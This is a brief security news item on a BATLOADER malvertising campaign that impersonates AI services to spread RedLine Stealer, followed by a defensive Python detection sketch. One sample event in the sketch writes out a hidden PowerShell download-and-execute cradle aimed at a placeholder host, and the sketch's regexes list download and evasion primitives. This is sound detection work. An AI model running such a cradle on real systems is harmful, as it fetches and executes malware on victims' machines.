Malicious Google Search ads are being used in a BATLOADER campaign to deliver the RedLine Stealer malware to unsuspecting users. The ads impersonate popular generative AI services such as OpenAI ChatGPT and Midjourney, which have no first-party standalone apps, and redirect users to fake websites. A user who clicks the ad is presented with an executable file and a PowerShell script that downloads and loads the malware from a remote server. The binary also uses Microsoft Edge WebView2 to load the legitimate ChatGPT or Midjourney URL in a pop-up window to avoid detection. This is not the first time the BATLOADER operators have exploited the AI craze to spread malware; similar attacks were observed in March 2023. Google is taking active steps to curb abuse of its search engine, and abuse of its ads has declined since its peak in early 2023. The report follows another phishing campaign, OCX#HARVESTER, which targeted the cryptocurrency sector between December 2022 and March 2023 using the More_eggs JavaScript downloader. The two key operators behind that malware-as-a-service have been identified as a Canadian and a Romanian national.
Source: Hackernews
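The delivery chain above (a downloaded "installer" that spawns a PowerShell downloader and hosts a WebView2 pop-up of the real site) leaves a recognisable parent/child footprint in process-creation telemetry. The following detection sketch is an added example, not code from the article or from any of the parties it names. The events are constructed to mirror the described behaviour, the WebView2 version folder and hostnames are placeholders, and the PowerShell cmdlets it looks for are generic download and decode primitives rather than the campaign's actual script, which the article does not detail.

```python
import re

# Constructed sample process-creation events (not real telemetry). Field names loosely follow
# Sysmon Event ID 1 / typical EDR process-start records. Paths and hostnames are placeholders.
SAMPLE_EVENTS = [
    {   # "installer" from Downloads launches a hidden PowerShell download cradle
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Users\alice\Downloads\ChatGPT-Desktop-Setup.exe",
        "command_line": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                        ".DownloadString('http://dl.example.invalid/stage2.txt')\"",
    },
    {   # the same binary shows a WebView2 window (the decoy pop-up of the legitimate site)
        "image": r"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\123.0.0.0\msedgewebview2.exe",
        "parent_image": r"C:\Users\alice\Downloads\ChatGPT-Desktop-Setup.exe",
        "command_line": "msedgewebview2.exe --embedded-browser-webview=1 --type=renderer",
    },
    {   # benign: maintenance script run from a fixed, non-user-writable path
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    },
    {   # benign: an installed desktop app hosting WebView2 from Program Files
        "image": r"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\123.0.0.0\msedgewebview2.exe",
        "parent_image": r"C:\Program Files\Contoso\ContosoApp.exe",
        "command_line": "msedgewebview2.exe --embedded-browser-webview=1 --type=renderer",
    },
]

POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
WEBVIEW2 = re.compile(r"\\msedgewebview2\.exe$", re.I)
# Locations an ordinary user can write to: the usual landing spot for a downloaded "installer".
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(Downloads|Desktop|AppData\\Local\\Temp)\\|\\ProgramData\\", re.I)
# Generic PowerShell download / decode primitives (assumed, not taken from the campaign).
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|"
    r"Start-BitsTransfer|\bcurl\b|FromBase64String|-enc(odedcommand)?\b", re.I)
# Evasion switches: hidden window, execution-policy bypass.
EVASION = re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass", re.I)


def evaluate(event):
    """Return the reasons an event looks like a downloader launched by a dropped binary."""
    reasons = []
    image, parent, cmd = event["image"], event["parent_image"], event["command_line"]
    if POWERSHELL.search(image):
        if USER_WRITABLE.search(parent):
            reasons.append("PowerShell spawned by a binary in a user-writable path")
        if DOWNLOAD_CRADLE.search(cmd):
            reasons.append("download/decode cradle in PowerShell command line")
        if EVASION.search(cmd):
            reasons.append("hidden window or execution-policy bypass")
    elif WEBVIEW2.search(image) and USER_WRITABLE.search(parent):
        # Low confidence on its own: many legitimate apps host WebView2, but they
        # rarely run from Downloads or Temp. It corroborates the PowerShell findings.
        reasons.append("WebView2 hosted by a binary in a user-writable path")
    return reasons


def triage(events):
    """Group suspicious findings by parent so the dropper and its children surface together."""
    by_parent = {}
    for ev in events:
        reasons = evaluate(ev)
        if reasons:
            by_parent.setdefault(ev["parent_image"], []).extend(reasons)
    return by_parent


if __name__ == "__main__":
    for parent, reasons in triage(SAMPLE_EVENTS).items():
        print(parent)
        for reason in reasons:
            print("  -", reason)
```

Grouping by parent is the point of the example: neither the WebView2 child nor a single PowerShell launch is conclusive alone, but one freshly downloaded binary that does both is exactly the pattern the article describes, and that is what an analyst should see in one alert rather than as two unrelated low-severity events.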
To mitigate these potential threats, it is important to implement additional cybersecurity measures with the help of a trusted partner like INFRA www.infrascan.net, or you can try it yourself using check.website.